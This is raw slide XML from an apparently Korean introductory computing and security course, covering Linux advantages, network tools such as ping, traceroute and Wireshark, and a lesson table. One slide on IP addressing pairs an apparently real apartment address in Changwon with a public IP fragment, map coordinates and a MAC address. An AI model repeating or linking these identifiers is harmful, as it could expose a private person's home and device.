          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>글로벌 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시장 전망</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AB8378E-E23B-438D-8E97-D8B4E3DFDD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6952091" y="1618167"/>
            <a:ext cx="4481762" cy="3461012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>리눅스의 장점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>이식성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>확장성 좋음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>( c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>기계어 구성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>풍부한 소프트웨어 개발 환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>오픈소스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 버그 패치 활발</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>완성도가 높음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>보안성 우수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>가벼움</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>무료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>맥북이 예쁨</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 8" descr="애플, 13인치 맥북프로 출시…&quot;10세대 인텔 CPU 탑재&quot;">
            <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B15A9734-BAF9-493D-AE1E-6D2202D733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9397" y="4320182"/>
            <a:ext cx="2532807" cy="16793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D9B50C1-E872-40FF-88FA-57CC760325C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8893146" y="6020588"/>
            <a:ext cx="2379058" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux File System =&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63348305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522980219"/>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네트워크 실습 </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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>네트워크 구조 데모</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핑</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경로 추적</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>네트워크 분석 도구</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, Wireshark)</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9047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1182099304"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1310910" y="1821554"/>
          <a:ext cx="9414335" cy="4679696"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725431">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2843156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="606903">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3828415591"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="623087">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3865886405"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="695915">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="319800261"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2896949">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="938618595"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="542166">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2768714408"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="480728">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="158015697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수치의 표현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진법</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음수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부동소수점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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1-1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자료의 표현 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>종류</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>아스키코드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>파일헤더</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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1-2</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퀴즈 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>– Steganography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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1-3</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프로세스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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2-1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메모리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7" action="ppaction://hlinksldjump"/>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리눅스와 파일시스템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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2-4</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파일시스템과 권한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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3-1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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Sys-01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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Sys-06</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서비스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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Web-01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구조 데모</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경로 추적</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IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>접근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Web-06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분석 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Web-07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편집기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로그 점검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Sys-02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심화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분석도구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 사용 심화분석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BF245AA-691D-480D-9E49-029688683265}"/>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FCC9E0B-75F7-440A-8757-F9C06CF3A47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B99893E-F724-498F-BD94-1CE4B9F1283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4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{401408C5-35CB-4600-A0E6-2FCA91FC0F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384191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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>IPconfig</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61D24305-5228-4C03-BAE9-85D76096D1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="602648" y="1690688"/>
            <a:ext cx="6143625" cy="4762500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33970B3C-B5F9-41AF-9E6C-1FCFA1EE70D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3130756" y="4620445"/>
            <a:ext cx="1859078" cy="163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9008DAD2-D30D-4DD6-883A-14D088D4D1B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3130756" y="4017211"/>
            <a:ext cx="1386739" cy="163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09E8D25-721D-4BDF-842F-AC413300A85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7180646" y="2969185"/>
            <a:ext cx="4302690" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>창원시 진해구 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>드림빌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>동        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>901</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>호</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70A09932-3EA3-483D-B556-53FF4EE61658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994709" y="3426100"/>
            <a:ext cx="2253075" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>59.19.162.         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>103</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67CC3077-F0F5-4304-8B00-6AFEC26812A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994709" y="3879737"/>
            <a:ext cx="2439575" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>NetworkIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>HostIP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADCC1DE-747C-4CAD-9884-9E69EA7A7075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7778413" y="4858332"/>
            <a:ext cx="3082316" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>52 S 468516 3889863</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>35.15118°N 128.65434°E</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495C93D6-EC0E-42A5-A11B-F74C90410DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7778413" y="5646574"/>
            <a:ext cx="3082316" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>40-B0-76-A4-F1-CC</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4664CA62-D158-4C46-9FBA-EC7919076C2C}"/>
              </a:ext>
